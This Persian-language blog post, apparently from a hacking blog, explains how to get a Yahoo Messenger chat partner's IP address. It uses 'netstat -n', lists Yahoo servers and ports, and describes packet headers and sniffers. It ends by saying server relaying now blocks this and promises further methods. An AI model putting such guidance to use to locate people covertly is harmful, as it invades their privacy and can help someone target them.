اند و در مورد همان سطر آخر به جای Ip طرف مقابل اسم کامپیوتر فرد را می بینید (نکته : هیچوقت اسم خود را موقع نصب ویندوز بکار نبرید، (تا بترکه چشم حسود) حالا فرض کنید که با دو نفر چت می کنید. pm دیگر هم اضافه می شود.(وای ی ی) دوباره دستور netstat -n را تایپ می کنیم. حالا نتایج زیر را بررسی می کنیم. ۲ سطر داریم که دارای پورت 5101 باشد، و چون آی پی اولین فرد را می دانیم، پس آی پی دوم، مربوط به نفر بعد است. در مثالهای بالا فرض بر این است که Explorer شما باز نیست

http://hackerpatogh.blogfa.com

بدست آوردن Ip در چت

مقدمه 

در پی درخواست های مکرر شما عزیزان مبنی بر بدست آوردن و یافتن IP در یاهو هنگامی که با کسی به چت کردن میپردازیم ، این آموزش برای شما گذاشته شده است .

Find ip in chat , Find IP Yahoo Chat

حتما می دانید که ‎Yahoo یکی از بزرگترین سرویس دهندگان اینترنتی است و برای سرویس دادن به کاربران خود سرورهای بسیاری نظیر Mail Server , Game Server , Chat server , SMTP server و... را در اختیار دارد
در این مقاله تنها  Yahoo Chat server را مورد برسی قرار می دهیم .

* برای دست آوردن IP در چت نیاز به برقراری یک ارتباط با کامپیوتر شخص مقابل داریم.

پر کاربرد ترین و   معمول ترین ارتباطات در Yahoo Messenger مربوط به موارد زیر است.

1- ارتباط متنی Text

2- ارتباط صوتی  Voice

3- ارتباط تصویری Web CAM

4-  Data یا همان Yahoo Send File

هر کدام از این ارتباطات از طریق Port و Protocol  مخصوص خود صورت می گیرد.

1- ارتباط متنی Yahoo Text Chat :
ارتباط متنی در Yahoo با استفاده از پروتکل TCP صورت می گیرد. سرورهای زیر برای ارتباط متنی مورد استفاده قرار می گیرند .

Yahoo Text Server :

1. scs.msg.yahoo.com

2. scsa.msg.yahoo.com

3. scsb.msg.yshoo.com

4. scsc.msg.yahoo.com

پورت های معمول برای این ارتباط :

Yahoo text port ==>(  20 - 23 - 5050 - 8001 -8002 )

هستند.

2- ارتباط صوتی Yahoo Voice Chat :
این نوع ارتباط اغلب از روی پروتکل UDP‌و گاهی اوقات نیز از روی پروتکل TCP صورت می گیرد.
ارتباط صوتی از سروهای زیر انجام می شود

Yahoo Voice Servers »
1- v1.vc.scd.yahoo.com
2- v2.vc.scd.yahoo.com
3- v3.vc.scd.yahoo.com
4- v4.vc.scd.yahoo.com
5- v5.vc.scd.yahoo.com
6- v6.vc.scd.yahoo.com
7- v7.vc.scd.yahoo.com
8- v8.vc.scd.yahoo.com
9- v9.vc.scd.yahoo.com
10- v10.vc.scd.yahoo.com
11- v11.vc.scd.yahoo.com
12- v13.vc.sc5.yahoo.com
13- vc1.vip.scd.yahoo.com

این نوع ارتباط از روی پورت 5000 و یا 5010 معمولا صورت می گیرد

3- ارتباط تصویری Yahoo WebCam :
این نوع ارتباط با استفاده از پروتکل TCP صورت می گیرد. سرور این ارتباط :

webcam.yahoo.com

است و برقراری ارتباط از طریق پورت 5100 صورت می گیرد.

4- Data یا Yahoo Send file :
این نوع ارتباط از طریق پروتکل HTTP صورت می گیرد . سرور مربوط به آن :

filetransfer.msg.yahoo.com

است و به صورت Default  از روی پورت 80 صورت می گیرد.

* پس از برقراری ارتباط داده ها ( صوت ، متن ، تصویر ، فایل و... ) به صورت Packet هایی به سوی مقصد فرستاده می شود .

** تعریف Packet : شاید این سوال پیش بیاید برای شما که Packet چیست ، پکتها بسته های اطلاعاتی هستند که می توانند از خطوط دیجیتال یا آنالوگ بگذرند . به عنوان مثال متنی که در هنگام چت کردن تایپ می کنید به صورت چند Packet (بسته اطلاعاتی ) جداگانه در می آید و از سیم عبور می کند.

در هنگام خروج هر Packet از کامپیوتر اطلاعاتی به هدر Header آن  اضافه می شود که مهمترین آنها :

1- آدرس IP مبدا (فرستنده )

2- آدرس IP مقصد (گیرنده)

3- ساختمان داده ها

4- نوع پروتکل
هستند .
تنها راه برای بدست اوردن IP طرف مقابل ، خواندن هدر Packet های ارسالی یا دریافتی است.

نرم افزار هایی نظیر Packet Sniffer وجود دارند که تمام Packet های ورودی و خروجی به یک کامپیوتر را دریافت و مشخصات آنها از جمله آدرس مبدا و آدرس مقصد را نشان می دهند.

---

اما بعد از این همه تفاصیل شما متوجه مشخصات کلی یاهو چت شدید اما چندی پیش Yahoo تغییراتی در سرورهای خود ایجاد کرد ، به همین دلیل دیگر نمی توان IP طرف مقابل را بدست آورد . دلیل این امر را هم در زیر برسی می کنیم.

شما در هنگام چت کردن در حقیقت Packet های خود را به سرور Yahoo می فرستید . پس سرور Yahoo آنها را به کامپیوتر طرف مقابل شما می فرستد. پس IP سرور Yahoo در فیلد آدرس مبدا قرار می گیرد نه IP طرف مقابل .

به این نکته توجه داشته باشید : بعضی میگویند چرا ما هنگامی که با دستور Netstat اقدام به یافتن IP طرف مقابل می کنیم توانایی یافتن IP طرف مقابل را نداریم ، خب نکته همین جاست که شما IP سرور یاهو را بدست می آورید زیرا پیغام شخص مقابل اول به سرور یاهو منتقل می شود سپس به کامپیوتر شما ارسال می شود ، پس مسلما شما باید IP سرور یاهو را ببیند

 اما خب زیاد ناامید نشوید یک سری روش هست برای بدست آوردن IP طرف مقابل که زحمت داره ولی می ارزه که طی چند مقاله آنها را به شما می آموزیم .

http://hackerpatogh.blogfa.com